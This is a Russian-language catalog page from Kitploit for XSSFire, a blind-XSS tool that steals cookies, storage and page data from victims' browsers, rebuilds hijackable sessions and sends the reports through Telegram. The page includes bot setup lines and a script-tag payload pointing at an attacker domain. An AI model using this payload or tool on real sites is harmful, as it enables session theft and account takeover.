Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/seifelsallamy/xssfire
ЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubseifelsallamy/xssfire

XSSFire

Автономный скрипт для Blind XSS.

Репозиторий
471041 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

XSSFire

Автономный скрипт для Blind XSS.

Как это работает:

Скрипт представляет собой комбинацию PHP и JavaScript: он перехватывает данные с помощью JS и отправляет их самому скрипту, затем создаёт файлы отчётов и доставляет их через Telegram.

Требования:

  1. Веб-сервер на Linux с доменом и SSL-сертификатом.
  2. Аккаунт Telegram (для получения отчётов BXSS)

Почему Telegram?

Простота настройки. Быстро. Всегда доступен.

Возможности:

  1. Перехватывает: IP, User-Agent, дату и время, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, если сработал из Iframe.
  2. Session Builder: JavaScript, который может восстановить сессию — откройте захваченный URL и инструменты разработчика, затем вставьте его в консоль и нажмите Enter. Если вам повезёт, вы сможете перехватить сессию.
  3. Уведомления в Telegram: быстрее и проще в настройке, чем электронная почта, и более доступны.
  4. Анти-спам: вы должны получать только одно/два уведомления на каждый захваченный URL. Однако скрипт время от времени сбрасывается, чтобы уведомить вас снова позже.
  5. Шифрование: вы можете задать пароль в скрипте, и отчёт, полученный в Telegram, будет ZIP-файлом, защищённым паролем. (Telegram-боты не используют сквозное шифрование).
  6. HTML-снимок: это HTML-файл, который будет доставлен вместе с отчётом; он должен выглядеть похоже на страницу вашей цели.

Установка:

  1. Зайдите в Telegram и напишите @botfather.
  2. Напишите /start в чате и создайте нового бота.
  3. При создании бота вы должны получить токен бота.
  4. Сохраните токен отдельно.
  5. Теперь перейдите в чат вашего нового бота, запустите его и поздоровайтесь.
  6. Затем перейдите по адресу: https://api.telegram.org/bot<bot_token>/getUpdates
  7. И сохраните ваш chat id.
  8. Откройте скрипт XSSFire и измените следующие строки:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Ваш Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Токен доступа вашего Telegram-бота
$password = False; //Защитить отчёт Blind XSS паролем. Оставьте False, если не используется.
  1. Загрузите скрипт на ваш сервер.

Для генерации payload-ов вы можете воспользоваться Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager Вы можете просто создавать payload-ы через это расширение, указав yourdomain.com/<путь к скрипту> в поле домена и нажав Save.

Примечание: вы можете изменить имя файла на index.php и загрузить его в корневой каталог вашего сервера, чтобы сделать payload-ы короче; тогда payload должен выглядеть примерно так: <script src="https://yourdomain.com"></script>.

Снимки:

bxss
bxss2
bxss3

Спасибо GPT-3 xD

Скачать инструмент